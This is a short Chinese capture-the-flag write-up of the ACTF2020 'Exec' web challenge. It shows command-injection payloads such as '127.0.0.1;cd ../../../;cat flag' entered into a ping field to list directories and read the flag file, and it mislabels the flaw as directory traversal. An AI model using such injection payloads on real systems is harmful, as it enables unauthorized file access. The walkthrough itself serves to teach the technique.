[ACTF2020 新生赛]Exec

题目来源：buuctf

题目类型：web

涉及考点：目录遍历

1. 题目直接给了一个输入框，ping一下127.0.0.1看看

接着查看目录，直接127.0.0.1;ls：

只有index.php，我们先看看：

127.0.0.1;cat index.php

发现还是这个输入页面，没别的东西了，我们接下来目录遍历去找flag

2. 逐步往上层遍历

利用 ../ 向上遍历，当传入127.0.0.1;cd ../../../;ls 时看到了flag：

直接查看就有了，最终构造的payload如下：

127.0.0.1;cd ../../../;cat flag

flag{d666afef-8d93-4e23-9a6c-46a14704e4bd}

3. 小结一下

目录遍历是一个Web安全漏洞，攻击者可以利用该漏洞读取运行应用程序的服务器上的任意文件。如果没有针对目录遍历攻击采取任何防御措施，攻击者可以通过请求URL从服务器的文件系统中检索任意文件。

日期：2023.7.20

作者：y0Zero